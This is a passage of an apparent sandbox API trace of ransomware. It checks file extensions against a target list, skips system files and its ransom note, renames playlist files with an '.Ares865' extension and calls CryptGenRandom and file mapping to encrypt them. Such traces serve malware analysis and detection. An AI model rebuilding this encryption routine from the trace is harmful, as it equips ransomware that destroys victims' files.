[0065.184] lstrcmpiW (lpString1="wpl", lpString2="mdb") returned 1 [0065.184] lstrlenW (lpString="sql") returned 3 [0065.184] lstrcmpiW (lpString1="wpl", lpString2="sql") returned 1 [0065.184] lstrlenW (lpString="sqlite") returned 6 [0065.184] lstrcmpiW (lpString1="rs.wpl", lpString2="sqlite") returned -1 [0065.184] lstrlenW (lpString="sqlite3") returned 7 [0065.184] lstrcmpiW (lpString1="ars.wpl", lpString2="sqlite3") returned -1 [0065.184] lstrlenW (lpString="sqlitedb") returned 8 [0065.184] lstrcmpiW (lpString1="tars.wpl", lpString2="sqlitedb") returned 1 [0065.184] lstrlenW (lpString="xml") returned 3 [0065.184] lstrcmpiW (lpString1="wpl", lpString2="xml") returned -1 [0065.184] lstrlenW (lpString="$er") returned 3 [0065.184] lstrcmpiW (lpString1="wpl", lpString2="$er") returned 1 [0065.184] lstrlenW (lpString="4dd") returned 3 [0065.184] lstrcmpiW (lpString1="wpl", lpString2="4dd") returned 1 [0065.185] lstrlenW (lpString="4dl") returned 3 [0065.185] lstrcmpiW (lpString1="wpl", lpString2="4dl") returned 1 [0065.185] lstrlenW (lpString="^^^") returned 3 [0065.185] lstrcmpiW (lpString1="wpl", lpString2="^^^") returned 1 [0065.185] lstrlenW (lpString="abs") returned 3 [0065.185] lstrcmpiW (lpString1="wpl", lpString2="abs") returned 1 [0065.185] lstrlenW (lpString="abx") returned 3 [0065.185] lstrcmpiW (lpString1="wpl", lpString2="abx") returned 1 [0065.185] lstrlenW (lpString="accdb") returned 5 [0065.185] lstrcmpiW (lpString1="s.wpl", lpString2="accdb") returned 1 [0065.185] lstrlenW (lpString="accdc") returned 5 [0065.185] lstrcmpiW (lpString1="s.wpl", lpString2="accdc") returned 1 [0065.185] lstrlenW (lpString="accde") returned 5 [0065.185] lstrcmpiW (lpString1="s.wpl", lpString2="accde") returned 1 [0065.185] lstrlenW (lpString="accdr") returned 5 [0065.185] lstrcmpiW (lpString1="s.wpl", lpString2="accdr") returned 1 [0065.185] lstrlenW (lpString="accdt") returned 5 [0065.185] lstrcmpiW (lpString1="s.wpl", lpString2="accdt") returned 1 [0065.185] lstrlenW (lpString="accdw") returned 5 [0065.185] lstrcmpiW (lpString1="s.wpl", lpString2="accdw") returned 1 [0065.185] lstrlenW (lpString="accft") returned 5 [0065.185] lstrcmpiW (lpString1="s.wpl", lpString2="accft") returned 1 [0065.185] lstrlenW (lpString="adb") returned 3 [0065.185] lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0065.185] lstrlenW (lpString="adb") returned 3 [0065.185] lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0065.185] lstrlenW (lpString="ade") returned 3 [0065.185] lstrcmpiW (lpString1="wpl", lpString2="ade") returned 1 [0065.185] lstrlenW (lpString="adf") returned 3 [0065.185] lstrcmpiW (lpString1="wpl", lpString2="adf") returned 1 [0065.185] lstrlenW (lpString="adn") returned 3 [0065.185] lstrcmpiW (lpString1="wpl", lpString2="adn") returned 1 [0065.185] lstrlenW (lpString="adp") returned 3 [0065.185] lstrcmpiW (lpString1="wpl", lpString2="adp") returned 1 [0065.185] lstrlenW (lpString="alf") returned 3 [0065.185] lstrcmpiW (lpString1="wpl", lpString2="alf") returned 1 [0065.186] lstrlenW (lpString="ask") returned 3 [0065.186] lstrcmpiW (lpString1="wpl", lpString2="ask") returned 1 [0065.186] lstrlenW (lpString="btr") returned 3 [0065.186] lstrcmpiW (lpString1="wpl", lpString2="btr") returned 1 [0065.186] lstrlenW (lpString="cat") returned 3 [0065.186] lstrcmpiW (lpString1="wpl", lpString2="cat") returned 1 [0065.186] lstrlenW (lpString="cdb") returned 3 [0065.186] lstrcmpiW (lpString1="wpl", lpString2="cdb") returned 1 [0065.186] lstrlenW (lpString="ckp") returned 3 [0065.186] lstrcmpiW (lpString1="wpl", lpString2="ckp") returned 1 [0065.186] lstrlenW (lpString="cma") returned 3 [0065.186] lstrcmpiW (lpString1="wpl", lpString2="cma") returned 1 [0065.186] lstrlenW (lpString="cpd") returned 3 [0065.186] lstrcmpiW (lpString1="wpl", lpString2="cpd") returned 1 [0065.186] lstrlenW (lpString="dacpac") returned 6 [0065.186] lstrcmpiW (lpString1="rs.wpl", lpString2="dacpac") returned 1 [0065.186] lstrlenW (lpString="dad") returned 3 [0065.186] lstrcmpiW (lpString1="wpl", lpString2="dad") returned 1 [0065.186] lstrlenW (lpString="dadiagrams") returned 10 [0065.186] lstrcmpiW (lpString1="_stars.wpl", lpString2="dadiagrams") returned -1 [0065.186] lstrlenW (lpString="daschema") returned 8 [0065.186] lstrcmpiW (lpString1="tars.wpl", lpString2="daschema") returned 1 [0065.186] lstrlenW (lpString="db-journal") returned 10 [0065.186] lstrcmpiW (lpString1="_stars.wpl", lpString2="db-journal") returned -1 [0065.186] lstrlenW (lpString="db-shm") returned 6 [0065.186] lstrcmpiW (lpString1="rs.wpl", lpString2="db-shm") returned 1 [0065.186] lstrlenW (lpString="db-wal") returned 6 [0065.186] lstrcmpiW (lpString1="rs.wpl", lpString2="db-wal") returned 1 [0065.187] lstrlenW (lpString="dbc") returned 3 [0065.187] lstrcmpiW (lpString1="wpl", lpString2="dbc") returned 1 [0065.187] lstrlenW (lpString="dbs") returned 3 [0065.187] lstrcmpiW (lpString1="wpl", lpString2="dbs") returned 1 [0065.187] lstrlenW (lpString="dbt") returned 3 [0065.187] lstrcmpiW (lpString1="wpl", lpString2="dbt") returned 1 [0065.187] lstrlenW (lpString="dbv") returned 3 [0065.187] lstrcmpiW (lpString1="wpl", lpString2="dbv") returned 1 [0065.187] lstrlenW (lpString="dbx") returned 3 [0065.187] lstrcmpiW (lpString1="wpl", lpString2="dbx") returned 1 [0065.187] lstrlenW (lpString="dcb") returned 3 [0065.187] lstrcmpiW (lpString1="wpl", lpString2="dcb") returned 1 [0065.187] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.Ares865") returned 132 [0065.187] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl.ares865"), dwFlags=0x1) returned 1 [0065.188] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.188] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=785) returned 1 [0065.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.189] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.189] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.189] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.190] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x620, lpName=0x0) returned 0x118 [0065.191] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x620) returned 0x190000 [0065.192] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.192] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.192] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.192] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.193] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.193] CloseHandle (hObject=0x118) returned 1 [0065.193] CloseHandle (hObject=0x164) returned 1 [0065.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.193] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66402e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66402e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf73e9a4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x410, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="07_TV_recorded_in_the_last_week.wpl", cAlternateFileName="07_TV_~1.WPL")) returned 1 [0065.193] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.193] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="aoldtz.exe") returned -1 [0065.194] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2=".") returned 1 [0065.194] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="..") returned 1 [0065.194] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="windows") returned -1 [0065.194] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="bootmgr") returned -1 [0065.194] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="temp") returned -1 [0065.194] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="pagefile.sys") returned -1 [0065.194] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="boot") returned -1 [0065.194] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="ids.txt") returned -1 [0065.194] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="ntuser.dat") returned -1 [0065.194] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="perflogs") returned -1 [0065.194] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="MSBuild") returned -1 [0065.194] lstrlenW (lpString="07_TV_recorded_in_the_last_week.wpl") returned 35 [0065.194] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 124 [0065.194] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="07_TV_recorded_in_the_last_week.wpl" | out: lpString1="07_TV_recorded_in_the_last_week.wpl") returned="07_TV_recorded_in_the_last_week.wpl" [0065.194] lstrlenW (lpString="07_TV_recorded_in_the_last_week.wpl") returned 35 [0065.194] lstrlenW (lpString="Ares865") returned 7 [0065.194] lstrcmpiW (lpString1="eek.wpl", lpString2="Ares865") returned 1 [0065.194] lstrlenW (lpString=".dll") returned 4 [0065.194] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2=".dll") returned 1 [0065.194] lstrlenW (lpString=".lnk") returned 4 [0065.194] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2=".lnk") returned 1 [0065.194] lstrlenW (lpString=".ini") returned 4 [0065.194] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2=".ini") returned 1 [0065.194] lstrlenW (lpString=".sys") returned 4 [0065.194] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2=".sys") returned 1 [0065.194] lstrlenW (lpString="07_TV_recorded_in_the_last_week.wpl") returned 35 [0065.194] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.Ares865") returned 133 [0065.194] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl.ares865"), dwFlags=0x1) returned 1 [0065.195] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.196] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1040) returned 1 [0065.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.196] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.197] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.197] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.197] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x118 [0065.201] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x190000 [0065.201] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.202] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.202] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.202] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.202] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0065.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0065.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.203] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.203] CloseHandle (hObject=0x118) returned 1 [0065.203] CloseHandle (hObject=0x164) returned 1 [0065.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.203] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf740fbac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x3fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="08_Video_rated_at_4_or_5_stars.wpl", cAlternateFileName="08_VID~1.WPL")) returned 1 [0065.203] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.203] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="aoldtz.exe") returned -1 [0065.203] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2=".") returned 1 [0065.203] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="..") returned 1 [0065.203] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="windows") returned -1 [0065.203] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="bootmgr") returned -1 [0065.203] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="temp") returned -1 [0065.204] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="pagefile.sys") returned -1 [0065.204] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="boot") returned -1 [0065.204] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="ids.txt") returned -1 [0065.204] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="ntuser.dat") returned -1 [0065.204] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="perflogs") returned -1 [0065.204] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="MSBuild") returned -1 [0065.204] lstrlenW (lpString="08_Video_rated_at_4_or_5_stars.wpl") returned 34 [0065.204] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 125 [0065.204] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="08_Video_rated_at_4_or_5_stars.wpl" | out: lpString1="08_Video_rated_at_4_or_5_stars.wpl") returned="08_Video_rated_at_4_or_5_stars.wpl" [0065.204] lstrlenW (lpString="08_Video_rated_at_4_or_5_stars.wpl") returned 34 [0065.204] lstrlenW (lpString="Ares865") returned 7 [0065.204] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0065.204] lstrlenW (lpString=".dll") returned 4 [0065.204] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2=".dll") returned 1 [0065.204] lstrlenW (lpString=".lnk") returned 4 [0065.204] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2=".lnk") returned 1 [0065.204] lstrlenW (lpString=".ini") returned 4 [0065.204] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2=".ini") returned 1 [0065.204] lstrlenW (lpString=".sys") returned 4 [0065.204] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2=".sys") returned 1 [0065.204] lstrlenW (lpString="08_Video_rated_at_4_or_5_stars.wpl") returned 34 [0065.204] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.Ares865") returned 132 [0065.204] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl.ares865"), dwFlags=0x1) returned 1 [0065.205] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.205] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1020) returned 1 [0065.205] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.205] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.206] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.206] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.206] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.206] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.207] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x118 [0065.208] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x190000 [0065.209] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.209] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.209] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.209] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.209] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.210] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.210] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.210] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.210] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.210] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.210] CloseHandle (hObject=0x118) returned 1 [0065.210] CloseHandle (hObject=0x164) returned 1 [0065.210] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.210] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.210] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.210] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66402e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66402e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf740fbac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x401, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="09_Music_played_the_most.wpl", cAlternateFileName="09_MUS~1.WPL")) returned 1 [0065.210] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.210] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="aoldtz.exe") returned -1 [0065.211] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2=".") returned 1 [0065.211] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="..") returned 1 [0065.211] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="windows") returned -1 [0065.211] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="bootmgr") returned -1 [0065.211] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="temp") returned -1 [0065.211] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", 